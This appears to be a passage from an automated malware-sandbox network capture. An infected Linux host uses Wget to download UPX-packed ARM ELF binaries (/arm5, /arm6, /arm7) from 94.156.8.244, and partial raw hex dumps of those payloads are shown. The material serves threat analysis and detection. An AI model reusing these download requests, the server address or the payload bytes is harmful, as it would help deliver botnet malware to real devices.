                                                                  Mar 29, 2024 10:40:22.892766953 CET1286INData Raw: 07 07 c5 bb dc 72 f8 70 22 b0 c6 8b 9d 11 e1 5d 8d 0c cc e0 bc 27 1c f3 38 28 f2 2b 40 3b 7e d5 78 45 dc 4c 3f 13 e3 ab c4 29 33 2f 35 c1 04 6b ff 09 8a d4 27 eb a7 fa 7d eb 63 5c 0f b6 5a ab ca 6d 0c 07 6c 24 cc 39 a0 d9 e1 26 e5 3c d9 6f 42 dc
                                                                  Data Ascii: rp"]'8(+@;~xEL?)3/5k'}c\Zml$9&<oB_q/E>Ja'$S ,D=Zkn7JrnRYk@n+oI?lWLyqTxU)E5A<wh|P!eJiU2DC
                                                                  Mar 29, 2024 10:40:22.892858982 CET1286INData Raw: 4a c2 90 a0 4f 91 57 fb 95 d3 e9 f2 3b 64 6a e0 cc d5 0e 0a b3 42 be 95 0f c7 64 50 a8 37 7d d6 19 12 83 7b 89 39 27 78 31 29 95 a6 7e 82 0a e8 dd c9 42 48 5a 9c 84 50 fd a5 f4 e8 31 5e 8d 05 ce 99 ef 03 47 2c 2b a6 b5 bb d3 e6 19 eb 46 8b 5a 38
                                                                  Data Ascii: JOW;djBdP7}{9'x1)~BHZP1^G,+FZ8`f>32(lQ%YuO0Wdb!0opo0USb~1!m ?)@$;L,ZUU,:#G}a,jpc92/pxPN-E{cV@oHHi
                                                                  Mar 29, 2024 10:40:22.892923117 CET1286INData Raw: 95 24 e9 fc 39 c2 54 5d f4 c3 78 0f 3c 86 ad 78 f1 f0 72 49 84 47 3c 0b 5d 8d 8e 7a 7d 9a 14 1d e7 61 c3 a1 f8 97 d9 df f4 8e 52 da f6 fb 7a ad 8c 16 67 16 0a 90 50 15 b9 5c 30 27 b4 5d bd 6b 2a 18 e8 0b de 3e 58 00 77 b5 e3 98 f7 81 fc d2 84 cf
                                                                  Data Ascii: $9T]x<xrIG<]z}aRzgP\0']k*>Xw*`T,kM2;CB%$qN&[2Zs]r;?e/-TshPF'M~xY)oD(;c/~E~5)62Z;6r+?SeuPDsSMAEZ&)mDG5
                                                                  Mar 29, 2024 10:40:22.892988920 CET1286INData Raw: 3e d2 ea 0a f3 04 7e 9e 84 bd f0 88 a1 8e 72 3f 50 0e 1b 2d c3 9c 76 29 65 e7 42 b3 4d 0f 70 3c e8 09 f0 11 7f 94 e4 e0 74 12 b2 f6 c0 01 e7 98 89 dd 34 e0 da e3 ed 1f ea 14 8f 1b f2 00 4e 9f 69 4f 00 14 35 21 ae 64 8f 85 95 4e 13 c1 55 41 e6 89
                                                                  Data Ascii: >~r?P-v)eBMp<t4NiO5!dNUAlROjgm]\#hC?M9bS]Gs#vzX};u/CJ|TMC.y0|Ho^\@+39s:LY9D^t_c=o)7kcd
                                                                  Mar 29, 2024 10:40:22.893043041 CET1286INData Raw: 8e c1 89 54 bc c2 94 c2 62 2e 18 dd cf 88 18 e4 59 b6 4f 2b 26 db 5e cd 3d 8f 04 51 f3 bf 04 ab cf 8f be 11 8b 60 9e 49 cd e4 3d 03 a9 03 52 68 ea d7 35 39 6d da 06 66 2d 3e 1d 2f e9 58 0a 58 57 07 29 65 35 00 55 5e 4d 9c 35 b2 dc 78 dc 7a b7 db
                                                                  Data Ascii: Tb.YO+&^=Q`I=Rh59mf->/XXW)e5U^M5xzY$,2#rxp;()bmp6EK`ON#Suy8\9BDPGi0mNPzb1)GT,37%;5^aLw 'NL velMp/
                                                                  Mar 29, 2024 10:40:22.893114090 CET1286INData Raw: b7 6b 44 8f e4 21 e6 19 93 95 01 09 8a 70 39 10 30 9f 52 ba 1a d7 6b 71 51 0f e3 05 0a ed ec 6f ce b4 96 9a 1c 5a 5a 66 86 27 42 97 31 7d ad 3a b4 e6 0c 9e 2a 67 d5 fd fc 93 32 de 46 00 79 bf b5 fc f7 b9 30 dc ec e9 c8 f5 ba 4c 0e 53 e4 0c 5a b8
                                                                  Data Ascii: kD!p90RkqQoZZf'B1}:*g2Fy0LSZVl?[r _O5@"loSQ VZIwk@HxtE;U@yhvIn&npjfA_4:~+t\NSX)!5{m\ sPsbVp/6i
                                                                  Mar 29, 2024 10:40:22.893168926 CET1286INData Raw: f0 03 8d 61 30 99 c0 a3 52 49 a0 0d fb 0a 7f 4f 98 26 f6 bb 20 b9 72 42 80 a7 1d 03 0b a0 0e 15 88 b2 d6 2d d7 09 d7 ee ef e5 a3 1c 0a 13 46 1b cf ee c4 eb d6 85 af b4 eb 7c b5 91 c2 a5 8e 02 50 2d 62 af b9 4f 5b 12 f5 7a 5c 86 34 97 3a b5 a9 07
                                                                  Data Ascii: a0RIO& rB-F|P-bO[z\4:F8|Au&^F;W9Zr%\G!,8]dPYkyQP{^v<]lEN*V</^|=,@71%Mm4
                                                                  Mar 29, 2024 10:40:22.893213034 CET1286INData Raw: e6 cb 4a 54 72 50 7d 97 a1 bb 67 c9 9f 1a 9b fa 04 f8 1b 1f 05 0f 9d 59 8d c7 43 65 e1 63 a8 22 56 40 ba 55 74 8a 12 bc a5 08 39 8e c6 5b f5 1a 7f 94 dc 85 28 c2 48 56 6b 39 fc a7 e3 59 97 77 c0 6a 16 2f 0b 6e e8 8e ea e9 d7 78 6f 7b 6c 4d 53 42
                                                                  Data Ascii: JTrP}gYCec"V@Ut9[(HVk9Ywj/nxo{lMSBCqYnv| *chu]z>AmM+}g8k]f8rAX9BymI\7ML:DGk:q$&;b1_7iF?(
                                                                  Mar 29, 2024 10:40:22.893277884 CET1286INData Raw: 0c c0 c8 c2 49 6f a0 5b d5 8d 52 e3 b9 8b 00 9d ea cf a1 58 5a 32 9f 70 46 df 1c ff 26 7f 46 5e 1b fb 11 98 a0 6a 36 fb 1f 32 4d 51 27 7a 73 22 89 51 8a d8 e4 59 ed 38 a7 c2 6e f7 76 cd e8 97 86 3a d2 e0 40 ad 2e 85 56 ea 1c 0d ca 8d 01 42 bb 67
                                                                  Data Ascii: Io[RXZ2pF&F^j62MQ'zs"QY8nv:@.VBgf\itqox+^>^iH0c=KD-qq`|yd/jk:I'L1K\^]Z-.[dAqah{&`c&=Y5)KSP9G;fk#
                                                                  Mar 29, 2024 10:40:23.095866919 CET1286INData Raw: a8 00 09 97 8e d9 f7 01 c7 e7 44 fd 13 57 fc 54 5a e9 98 b2 f6 b4 13 38 8d c6 65 a3 19 ed 34 ba 6a ad e6 be a9 67 e2 c9 1c e8 2c 70 ab 4b fb 33 87 06 be 6f ff 79 93 bf a9 5c 69 3b c2 9b e2 70 c7 fe 57 a2 42 9f 99 c7 eb 7b 4d 43 36 05 67 b8 2e 08
                                                                  Data Ascii: DWTZ8e4jg,pK3oy\i;pWB{MC6g._h*Ds{7/:n?X.i?*q,&^"E5bV<@dSTs<rHG>jxdlO/U,NAud2bl9UfrV_O+)A]B


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  5192.168.2.234313694.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:24.093087912 CET155OUTGET /arm5 HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:24.296530962 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 32736
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Fri, 29 Mar 2024 06:30:38 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:24 GMT
                                                                  Data Raw: 7f 45 4c 46 01 01 01 61 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 40 ed 00 00 34 00 00 00 00 00 00 00 02 00 00 00 34 00 20 00 03 00 28 00 00 00 00 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 ef 7e 00 00 ef 7e 00 00 05 00 00 00 00 80 00 00 01 00 00 00 98 0c 00 00 98 0c 03 00 98 0c 03 00 00 00 00 00 00 00 00 00 06 00 00 00 00 80 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 74 da 36 ba 55 50 58 21 cc 11 0d 17 00 00 00 00 5c 27 01 00 5c 27 01 00 94 00 00 00 53 00 00 00 0e 00 00 00 1a 03 00 3f 91 45 84 68 3b e0 7d a4 b8 05 5e ff bd e7 e6 0d 02 f9 91 c0 cb 66 3c d3 af 26 31 8a a7 b7 96 a7 d7 f9 c5 1e 10 c6 37 b1 dd 0a 35 f8 9c 19 33 79 c5 71 83 99 a3 a1 47 53 4f e0 aa e2 42 fb 07 93 52 29 97 0f d5 3b 32 90 d9 45 15 f4 48 24 15 5c 21 01 00 db 6a 00 00 0e 50 00 00 1a 03 00 06 b0 8f 6d a7 01 aa 74 15 4f e8 26 11 5d 9b a2 ff 23 8d 6e 9c cd cd ff 78 56 f0 92 83 55 a8 74 a8 2e 12 55 1d 74 35 ab 07 04 33 74 6e c8 a2 37 ff 45 97 3b 56 37 2c bf b5 90 8e c0 f8 c5 bc 55 4b 3b 4f 7e c5 f1 5c 56 c0 b3 62 c0 3a e0 db 7d 30 56 a6 d6 1b 0a df 83 6f 44 c1 37 b7 77 f9 86 b0 d9 61 ba 59 9a b2 90 eb 9a e0 9f 0f 85 9f b9 40 43 5d 8b 97 78 c6 6a 69 d2 e7 ac 2c 45 66 0d ad 96 b3 a1 4b d7 d9 23 54 4d ef 91 9b 0f 71 a1 f1 4b af c6 28 1f fc 9c 7e e6 ea aa d3 53 f6 4d 1f 4a bd 72 24 fe d0 15 2a 84 db 2f 50 cd c6 df dc cf 18 96 f4 0a 6a da 48 d6 2b 14 d0 53 b9 bd 8e c8 10 c9 87 f6 6c 9b dc c5 7a cf 65 d1 0c 8e 7e 7d 4b 54 f4 86 8c 33 69 d1 ef a3 2c de 72 9a 2a 4e 2d 7f d5 44
                                                                  Data Ascii: ELFa(@44 (~~Qtdt6UPX!\'\'S?Eh;}^f<&1753yqGSOBR);2EH$\!jPmtO&]#nxVUt.Ut53tn7E;V7,UK;O~\Vb:}0VoD7waY@C]xji,EfK#TMqK(~SMJr$*/PjH+Slze~}KT3i,r*N-D
                                                                  Mar 29, 2024 10:40:24.296612024 CET1286INData Raw: ec a6 7c 22 df 42 67 97 09 7f 98 75 09 dd 42 8a 63 f2 32 9a 8b af 18 4e 93 0c f9 40 63 e0 11 1f 7c 67 b6 86 c3 13 14 df 0c 57 62 c4 7e fb 55 20 53 30 48 62 26 6d 69 22 ac bb 1c 11 86 09 dc 58 3a e1 eb 93 83 01 b5 9f 36 24 28 b6 fa dd 1e c6 f6 76
                                                                  Data Ascii: |"BguBc2N@c|gWb~U S0Hb&mi"X:6$(v(PNUL{>1C!EIhJR,,eS5b<7Oau@l*.<[Bz 4|-&lY.69A!k]y][9yrwFu
                                                                  Mar 29, 2024 10:40:24.296681881 CET1286INData Raw: aa 7c 39 59 bc e7 f4 6e 2c 18 39 50 6b b1 92 fb d5 8f 7c 06 1e 4e 6e 9a b9 aa 9f a6 8a f0 8e 51 26 b8 1a 84 16 8d 98 fd c8 02 dd bf a0 09 81 3e 0b 63 1e b9 dc 25 0c 7a 4a dd e3 15 0e a4 41 b2 05 88 21 d6 ec 9e bc 8f b3 c7 b9 60 b8 87 4d 38 66 aa
                                                                  Data Ascii: |9Yn,9Pk|NnQ&>c%zJA!`M8fC51R-Iv[5</,,pP=".HW0450@{u&SLb_>bg*NO(E`q}i4gc;|]Yux&
                                                                  Mar 29, 2024 10:40:24.296740055 CET1286INData Raw: 0b 2f df ef 70 95 8a d7 0c a7 46 41 5b 37 0d c4 51 68 aa e1 c9 f7 6b 64 54 13 6e 75 fd af 1e d4 85 b3 9f 32 52 53 70 32 54 8d a6 a5 a4 c4 46 fe 22 59 75 89 b5 c5 ea f2 10 25 bb 24 34 83 d6 c6 77 b5 db 3f 13 bc 5e c4 58 9b e1 92 6b 74 a7 0e c3 d8
                                                                  Data Ascii: /pFA[7QhkdTnu2RSp2TF"Yu%$4w?^Xkt [)?$<-C_{`yhT/1r8fyC`{MuTAMcavggaK_g9-gh~HkW:=jWel@<4dwqx
                                                                  Mar 29, 2024 10:40:24.296844959 CET1286INData Raw: 0b 28 a5 ea a1 f0 2f 70 bb 31 c4 be 86 22 f6 55 fd 27 b0 34 97 ee d2 f1 b1 c1 c6 87 b3 16 6b 29 64 e9 30 ca 37 a9 c2 9c 6d e4 31 06 7a 1f dc c2 ee c6 67 fe b3 58 29 ad 94 8e 0e 7e c9 70 6e 0e 82 ae b2 8d 48 c6 33 8d 8b dc bb 40 9f 23 31 d2 16 a4
                                                                  Data Ascii: (/p1"U'4k)d07m1zgX)~pnH3@#1Oe;'SuNKEb_|]"ivE?Ef*4f5^{Y6s="r/ga;6 q8PFm*;Cq8LXN|u^6.<8Cdw\\kTg
                                                                  Mar 29, 2024 10:40:24.296906948 CET1286INData Raw: 0b d1 a5 7f 71 90 4d 8f 01 ff 78 ab 89 90 78 d1 db cf fb eb af 8d 30 e1 11 35 65 66 62 46 04 d9 5e dc 43 42 5c ed 49 ba ba bd 00 3b c4 b1 41 e5 9b 3d 2c cd 6e 45 ba 25 70 06 e9 d4 55 6b d1 ef b7 f6 5e a2 54 d5 a0 47 42 f9 a7 ab 0d 99 8f fc b0 4b
                                                                  Data Ascii: qMxx05efbF^CB\I;A=,nE%pUk^TGBKf:ZZrnYG\ZiT,[]auVCo^p]Z)m <VZ}#j7#r,gKLF(6pU\ou/Y'P<s1jfjsrA-n]|Jd
                                                                  Mar 29, 2024 10:40:24.296972990 CET1286INData Raw: a4 f0 cf 4d 94 2a 01 75 b8 d6 e8 5a db 18 de 2b 85 e5 be f0 51 6a 5a 8a 9b 3e b4 37 87 bc 8b 84 0a b2 e5 d1 38 c2 49 3d 51 64 e8 92 89 4c 17 93 bf 57 63 ec 44 7f e2 e1 dd 23 c6 df 5a 0d 51 43 ff 83 82 a9 16 f4 1a 5c 42 e0 f7 1c 87 f6 ca 7b 12 4e
                                                                  Data Ascii: M*uZ+QjZ>78I=QdLWcD#ZQC\B{NMX6=%uN]<;-vv39*Fs#fmRZ_Q[/?5NbdE>|g"V6;Efn>t_5uRfe>mJ1e
                                                                  Mar 29, 2024 10:40:24.297035933 CET1286INData Raw: 17 38 ea fb 32 8c c9 2d f8 54 f2 25 77 3d fb 57 f8 1e 99 01 13 d3 d2 fe 4d b3 c8 82 cf de 7b ca a8 b9 4c ae fd b3 ab 11 d0 fd b2 ef 59 d9 21 6c 46 83 9a 21 ff 29 04 07 ea e6 01 0d 74 be 5f cf 57 99 2e 25 f7 12 ac 95 a0 34 c7 bf d2 b2 31 0e 64 8f
                                                                  Data Ascii: 82-T%w=WM{LY!lF!)t_W.%41d:!o'_kvFjPUsFmA93:7~Uc,u ehC-$^m^}:\SFvf#7nP+/FC_~N xE-8QTB0?
                                                                  Mar 29, 2024 10:40:24.297076941 CET1286INData Raw: 9c 5f 6d c5 18 9e e8 1d cc 68 b0 b4 25 20 bd c7 00 e2 67 06 a6 a9 0e 26 38 3e 7b 8e 78 c7 32 a6 85 56 ec 1a 95 15 36 f1 11 76 8a 24 56 af dd 91 c5 eb fa 7e db 42 fa a2 e9 80 7b 3d f2 8a 98 d5 a6 cb 1d 41 8e 05 6d 73 9f 03 3e c5 a0 6e 4e 01 c7 42
                                                                  Data Ascii: _mh% g&8>{x2V6v$V~B{=Ams>nNB7XJ5J!/0.Lda7?o`J!z,q*WDbmwo1Ve4C'tL}GYqu4r.Yk0)6ue^n//#AS"n_:?w
                                                                  Mar 29, 2024 10:40:24.297139883 CET1286INData Raw: 0a 86 94 2f d5 9b bd 72 0b 02 16 91 86 b0 6d 6d b9 96 55 2f ca e8 cf b8 ba ad 4d d1 d3 35 f1 4e f6 ef 22 43 e4 68 87 70 4c b1 ec 14 0c 5d 85 05 0a 7b 46 ea 70 65 c2 f9 a5 84 73 fb e6 81 1b 1e 63 19 4f f5 c3 09 a4 15 8a a2 c4 8e c3 6e c0 9f 22 24
                                                                  Data Ascii: /rmmU/M5N"ChpL]{FpescOn"$d3N$+:H]uHw$%_FC@!jFI0<7&xbg<9#X_j4/UjRL/'J}q$Ad}8ScT?Vo<Ar:
                                                                  Mar 29, 2024 10:40:24.504867077 CET1286INData Raw: 11 30 04 b9 17 d0 de 27 e6 29 fb 77 fb 97 34 f4 b1 9f 87 27 36 43 b0 8b 01 ee 66 08 b3 7c 68 dc 2e a7 9c 57 ba c1 81 ff 1e d6 06 3a be e8 1a 8b 6a f2 59 1c 30 d7 1c 55 db ff eb 67 5a b8 b8 5d fc f5 de da ea 44 a8 a5 92 4c 8d 29 29 17 83 80 24 54
                                                                  Data Ascii: 0')w4'6Cf|h.W:jY0UgZ]DL))$T`"%b~UM3j~86_R[I5$yVl *I{v}zz%jdc6Imy]p7?Nqvv&T& }5/mM


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  6192.168.2.234314494.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:32.038968086 CET155OUTGET /arm6 HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:32.243849039 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 36932
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Fri, 29 Mar 2024 06:30:40 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:32 GMT
                                                                  Data Raw: 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 18 fd 00 00 34 00 00 00 00 00 00 00 02 00 00 04 34 00 20 00 03 00 28 00 00 00 00 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 05 8f 00 00 05 8f 00 00 05 00 00 00 00 80 00 00 01 00 00 00 44 3d 00 00 44 bd 03 00 44 bd 03 00 00 00 00 00 00 00 00 00 06 00 00 00 00 80 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 3f f8 1b 60 55 50 58 21 08 12 0d 17 00 00 00 00 64 55 01 00 64 55 01 00 94 00 00 00 54 00 00 00 0e 00 00 00 1a 03 00 3f 91 45 84 68 3b de de a6 0f 23 f0 d4 24 19 82 31 29 86 89 04 c3 09 14 62 2a d0 be 4b a5 e7 13 fd a8 45 b5 09 ba 25 e7 50 3e 76 00 32 b8 a0 7e c3 14 98 11 a0 e1 34 3e 0d 59 08 84 0a fb 6e c2 4e 3f b2 d6 1c 1b 73 17 54 03 8a 07 41 03 0f 52 84 ac 45 01 00 7c 7a 00 00 0e 50 00 00 1a 03 00 06 b0 8f 6d a7 01 aa 74 15 4f e8 26 11 65 f9 d1 f7 b7 41 f5 f3 f6 85 47 9b 24 6f 50 d9 81 bb 1b f2 5a 81 b7 24 aa 96 58 c5 87 f6 69 04 d8 a7 e7 f5 ca d7 12 c6 a2 25 ce 41 25 05 d0 2e d1 d7 dc 42 f1 03 04 93 92 26 93 ab ed 35 c3 c1 d8 e6 8b 6c 8a 78 33 aa a1 2f 1c 2e 38 f5 84 7c 19 be 1e 1c a6 2b 9d 14 a3 83 82 9c c9 ee db 31 0e 50 4f bc 26 90 8e 9f 00 82 1f 80 1a cc 87 40 2d 3b 4e cf 8c 61 35 d8 ee 1c 01 eb a5 4b fd 2a f0 6e 81 7f f2 4b 6d 99 43 5b 43 9c 81 6f 7e 5b 37 f2 2b 52 54 9a 42 67 72 42 e1 d3 d1 4c f2 6f af 45 75 52 42 fb a6 d6 83 ad 53 5c ea 01 57 f2 f6 91 c2 f8 5d c9 03 e2 e6 cb c2 64 9f 85 c5 45 1b a3 d6 8b 52 38 dc fe 22 44 3e 01 ba 64 c5 40 9e 49 2e 5d 74 6d dd a0
                                                                  Data Ascii: ELF(44 (D=DDQtd?`UPX!dUdUT?Eh;#$1)b*KE%P>v2~4>YnN?sTARE|zPmtO&eAG$oPZ$Xi%A%.B&5lx3/.8|+1PO&@-;Na5K*nKmC[Co~[7+RTBgrBLoEuRBS\W]dER8"D>d@I.]tm
                                                                  Mar 29, 2024 10:40:32.244077921 CET1286INData Raw: ba 24 16 c5 bb 39 ec 87 d4 95 30 86 e4 80 d3 f0 66 52 5c f5 32 e1 24 da df 8d 45 b6 90 8c 57 b6 30 e2 7c f1 b0 50 f0 a2 b8 88 4d 93 df 7a b2 4c c3 63 46 ad 95 19 c7 d1 33 cb 6c fa 93 97 ca 97 8c f8 60 99 10 7c 0b 3b ca 72 97 f5 3c e7 06 7f 64 3c
                                                                  Data Ascii: $90fR\2$EW0|PMzLcF3l`|;r<d<"?iKBn6Wk#r6qK]+/Z.Y$^0PwC2B6zCq[ow7i+kxF|_P^7|<t;D#H_]Lj$Ye
                                                                  Mar 29, 2024 10:40:32.244148970 CET1286INData Raw: 9e 6a de 36 65 ba 2c bb b9 cf a0 48 db 7c 3e cf a1 ac ce 6e 89 e1 f8 46 f6 28 a1 8e db 44 d7 00 2f ec de 16 7b c2 b7 d7 fa fd cd 0a 37 f5 e5 3a 10 e6 8f 2d c6 ae ef ac 78 c4 ed bd 6a a9 a4 52 2f d9 04 43 ed 51 da 52 55 f7 ef b5 45 61 3f 97 8b c9
                                                                  Data Ascii: j6e,H|>nF(D/{7:-xjR/CQRUEa?1YO@yHIHw_v(\vs!Oy;}!oUP+0KP\}+y&qkTwg&e0&VNt&OTwHU{tCSTO1;Xb!(]:5w,
                                                                  Mar 29, 2024 10:40:32.244198084 CET1286INData Raw: 56 44 b7 7c d9 cf 34 08 ca bd 30 45 f6 58 bc ef 80 80 46 92 b2 01 11 7a 8d c6 a8 63 a0 4a f7 8f bc b9 b0 ef 16 bb 9a 55 40 f3 3a df a7 fa 50 28 88 e7 a6 cb e0 44 c1 17 01 a8 67 ee 79 fb bb 75 02 33 c4 a4 c6 d9 1d 88 77 3d 34 fa 35 5e d0 be 99 9b
                                                                  Data Ascii: VD|40EXFzcJU@:P(Dgyu3w=45^Y=$?5-F]YtjsWn!@Sa$N4zCD|^;PLIw)~35QUe{$NC<U<)EJvRiXyzx
                                                                  Mar 29, 2024 10:40:32.244277954 CET1286INData Raw: 57 a2 30 fb 84 77 82 ce 90 3c 6d c3 07 35 10 9e 2d b6 f8 3f ab 60 50 7a a2 a2 29 f2 42 dc c3 13 69 65 0a f4 f3 03 1c 67 f3 3d ef ff a3 47 57 0d 1c 98 69 00 32 c7 87 f1 5a 77 82 8e dd 4e da a1 fe 28 96 63 20 d9 3f 88 d3 4b 85 c6 1d a9 14 5c 52 a2
                                                                  Data Ascii: W0w<m5-?`Pz)Bieg=GWi2ZwN(c ?K\R)\[%N&-OyKb&XHWgS5*DuCOeBdn+/P'?Mm^{:c]DC.Qt\lF@Iqr,
                                                                  Mar 29, 2024 10:40:32.244292021 CET1286INData Raw: a2 7c 27 a6 16 72 7b a0 74 c8 c1 bc 27 13 db cf 9a 50 bc 08 ab be 42 52 31 1c 35 ce ba 67 12 4a 25 86 15 d4 dc f2 26 71 c5 75 26 fb 5d 16 d9 70 28 57 7a b8 6d 4b f4 e5 ad c7 93 e2 98 4a a2 0f 92 8e 02 4c a9 1d 9b 10 06 1c 3a 8d 29 dc fc 2b 86 d6
                                                                  Data Ascii: |'r{t'PBR15gJ%&qu&]p(WzmKJL:)+M6Q%CL<>eGk/{J(CP0 \('g"=+3@P9cAnbet(G,F_poNUvPeP`:.o~5=g?iN%2AY
                                                                  Mar 29, 2024 10:40:32.244368076 CET1286INData Raw: 5f 69 75 15 8a ee 5f 1d 0b 7a 73 a1 83 15 e7 0d 4c 2c 04 ce 71 61 05 09 f5 2a dd 3f 6b 4e 65 a0 2a 30 a3 3a 97 70 84 30 87 75 a8 07 e7 dc 30 e0 48 e9 8e 11 df d3 d1 da d8 44 cb a5 fa 9c 8f 7b 0f b3 ca 0e ff 1c f3 60 84 f3 ae 91 70 96 24 7e 10 6b
                                                                  Data Ascii: _iu_zsL,qa*?kNe*0:p0u0HD{`p$~k2U[$uX'3J65eyTM+{}i*pu'nSkc2N+SMYu#k+@Lkit
                                                                  Mar 29, 2024 10:40:32.244398117 CET1286INData Raw: a8 49 87 c9 bc b2 0a 58 8f ae ac 52 27 8f 85 fa d4 eb ec 90 54 a5 f1 a2 c6 ab fa b6 c8 19 37 7b 7e d4 ce c5 51 ee cb 3a 93 7c 32 68 7c 19 00 59 9c bd 23 57 21 19 5a 25 bb 72 07 db f9 80 a5 7c e9 74 d7 3f 7f 19 4f 56 31 cf bd 36 b9 12 a1 bf 03 49
                                                                  Data Ascii: IXR'T7{~Q:|2h|Y#W!Z%r|t?OV16I?w0j%-8wc{$,Oj9"1 9K`37TG-B4F43 <hS|[mu9)JXK!{<V`0[d?D`r7Q+k&
                                                                  Mar 29, 2024 10:40:32.244456053 CET1286INData Raw: 67 e0 8c 4a c5 2e 7f 98 00 03 f3 a8 4d bd ee ad 61 59 5b 71 aa dd 41 f6 fa c0 d2 4b bb d2 b2 e4 03 f0 bd 1e 8b aa b0 f0 54 e0 be 34 8d 2c cd 27 d2 02 55 b1 e6 e3 42 47 1a 76 7e e8 c4 27 29 a5 53 75 41 f2 1a d2 a8 04 35 71 df d4 d4 3c 26 f6 e3 aa
                                                                  Data Ascii: gJ.MaY[qAKT4,'UBGv~')SuA5q<&2LU2o>$onW|X@A,DOY+@1\A>LG/%N#IC]2XP|$I2J;J$cz0Vm\fFb{gD!TQxxr>L
                                                                  Mar 29, 2024 10:40:32.244539976 CET1286INData Raw: b2 75 b1 5a 0b c5 fc 5e 11 1a 2a 4a a2 70 ed 0a 02 cd 5e 9c d4 38 f9 fc 7a a2 e8 63 53 0a 0e 54 bf 3b c3 61 55 0f 16 ac 65 db e5 1e 99 18 de d7 11 f0 7c 4d 03 3e 55 b3 c1 2d 0d 1b 29 a1 8d 6f 19 f7 84 7a 8e f5 50 61 28 c7 29 0e 5c a7 83 48 b9 b5
                                                                  Data Ascii: uZ^*Jp^8zcST;aUe|M>U-)ozPa()\H$LF1=HAIoxN)P+gybgt(JXiZ-P-@'`B/F W-Rr#Cl`V@7@Z@-S
                                                                  Mar 29, 2024 10:40:32.447947025 CET1286INData Raw: 07 e5 e6 1e 92 3f fc 14 aa ca 39 01 42 f0 06 33 0b f8 1f 4c 62 66 20 16 c5 06 d5 21 79 19 a2 73 cf 4d f8 dc e4 56 c0 63 3c 51 17 ef a6 3d d8 72 88 31 40 36 c0 72 e8 ed 3f 94 d5 86 56 df 00 d7 c9 36 18 9f ad 91 ef 8a e9 1a cc 1f 99 3d db 8c b1 03
                                                                  Data Ascii: ?9B3Lbf !ysMVc<Q=r1@6r?V6=Rbaz$wHzE^BgXNTx <*,k?9TPHtJ"tOuOZ#IzXtc-|kq1Jl^d O:)^<[]F$)P0


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  7192.168.2.234315094.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:33.631148100 CET155OUTGET /arm7 HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:33.833272934 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 58172
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Fri, 29 Mar 2024 08:21:02 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:33 GMT
                                                                  Data Raw: 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 20 0d 01 00 34 00 00 00 00 00 00 00 02 00 00 04 34 00 20 00 03 00 28 00 00 00 00 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 0d 9f 00 00 0d 9f 00 00 05 00 00 00 00 80 00 00 01 00 00 00 20 6d 00 00 20 6d 03 00 20 6d 03 00 00 00 00 00 00 00 00 00 06 00 00 00 00 80 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 bf f7 94 61 55 50 58 21 08 12 0d 17 00 00 00 00 cc 67 02 00 cc 67 02 00 d4 00 00 00 6a 00 00 00 0e 00 00 00 1a 03 00 3f 91 45 84 68 3b de de a6 0f 23 f0 d4 24 19 aa 16 6f f9 c8 c4 c9 95 7f 2c 59 8b 11 96 ac 14 3b 47 25 48 a0 8d 80 f1 9d 6d 9f ba b4 bc 8f 64 69 9c 6f 95 59 c6 d1 53 d2 6f 52 77 fe 69 ef e1 f9 3c 58 de 04 23 06 c0 b0 e7 ec d7 a0 88 2d d6 03 a2 a4 73 53 70 c6 14 4c 6f 3e 4b 2c ce 0c 1a 42 cf 88 70 53 d7 1a 80 64 74 01 00 5b 8a 00 00 0e 50 00 00 1a 03 00 06 b0 8f 6d a7 01 aa 74 15 4f e8 26 11 65 f9 d1 f7 b7 41 f5 f3 f6 85 47 9b 24 6f 50 d9 81 bb 1b f2 5a 81 b7 24 aa 96 58 c5 87 f6 69 04 d8 a7 e7 f5 ca d7 12 c6 a2 25 ce 41 25 05 d0 2e d1 d7 dc 42 f1 03 04 93 92 26 93 ab ed d7 1a b3 09 7b 60 f0 33 b1 17 f9 34 51 87 be e0 b6 30 89 6f a8 c2 b1 32 3f dd 43 86 da 2e 1b f4 91 47 a5 99 cc a6 d9 a3 c0 36 f3 76 0d 14 20 dc 9d b5 6c 20 9e 8d e6 1b d3 5c 